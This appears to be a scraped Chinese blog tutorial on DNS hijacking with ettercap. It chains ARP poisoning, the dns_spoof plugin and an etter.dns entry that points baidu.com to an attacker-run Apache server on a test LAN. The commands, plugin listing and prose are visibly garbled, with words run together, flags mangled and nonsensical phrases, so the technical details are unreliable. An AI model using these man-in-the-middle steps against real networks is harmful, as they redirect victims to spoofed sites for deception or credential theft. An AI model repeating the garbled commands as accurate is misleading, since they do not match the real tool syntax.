首页 > 编程知识 正文

dns劫持教程,ettercap下载

时间:2023-05-05 21:29:18 阅读:52076 作者:2631

不知道是否使用过cainabel这个软件,是除了可以执行ARP毒化以外,还可以用于收集操作系统指纹等的集成化工具包。 Ettercap也是类似的工具包,插件提供DNS欺骗/操作系统指纹采集等功能。 查看ettercap -P list中可用的插件及其摘要:

$ sudo ettercap-plist ettercap0.8. 2版权所有2001-2015 ettercapdevelopmentteamavailableplugins 3360.DNS _ spoof 1.2 send DOF tan IP address. find _ IP 1.0 searchanunusedipaddressinthesubnetfinger 1.6 fingerprintarresedipaddressinthesubnetfinger 1.6 t.sssubnethed ler 1.0 becomerootofaswitchesspanningtree例如,要使用dns_spoof插件进行dns欺骗,请键入以下命令:

从sudo ettercap-TQ-iwlp4s0- pdns _ spoof # ettercap-plist中列出的许多插件中选择dns_spoof插件和插件dns_spoof的使用方法

man ettercap _ plugins . DNS _ spoofthisplugininterceptsdnsqueryandreplywithaspoofedanswer .简要说明DNS欺骗的原理。 '网络上的主机是按IP地址定位的,表示DNS欺骗原理的IP地址很难记住,所以用容易阅读和记住的域名代替IP地址。 但是,域名不能直接找到要访问的主机,而是依赖于域名解析过程。 当客户端在浏览器中输入www.baidu.com时,查询将发送到DNS服务器。 服务器响应接收到DNS查询,并将baidu的IP地址返回给客户端。 大家在这一系列文章中逐渐积累了ARP诈骗的经验,发现这种问答式的对话过程很容易被篡改。 实施ARP诈骗后,中介修改服务器DNS响应中的IP字段,最终将客户端引导至虚假百度。

来到这里,有了测试用的局域网环境、ARP中介。 现在,baidu假装响应浏览器请求的http服务器少了一个。 为方便起见,安装apache2服务器并返回apache2欢迎页面。 拙劣的伪装术。

apt-getinstallapache2service Apache 2开始

上图显示了部署Apache2服务器后中间人主机的屏幕快照。 根据dns_spoof帮助文档,在DNS欺骗之前必须修改dns_spoof配置文件etter.dns。 此文件的位置不一定像帮助文档中那样位于/usr目录下,在更改之前请使用find命令进行搜索。)。

#微软Sucks; ) # redirectittowww.Linux.org # Microsoft.com a 107.170.40.56 *.Microsoft.coma 107.170.40.56 www.Microsoft 通过参考此示例,可以将microsoft.com域名解析为linux.org服务器地址,并将baidu.com域名解析为中间人主机IP,就像#猫中的老虎一样。 Baidu.com a 192.168.75.133 *.Baidu.com a 192.168.75.133或更高版本,所有准备就绪,可以执行DNS欺诈:

ettercap-TQ-ieth0/192.168.75.129//192.168.75.129是本次局域网

最后使用wireshark查看dns请求,受害浏览器访问baidu时,向路由器发出dns请求,请求解析域名:

但是,由于收到了被中介篡改的dns响应,浏览器最终访问了中介的http服务器。

是的,这篇文章结束了。 下一篇文章介绍了ettercap过滤器

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。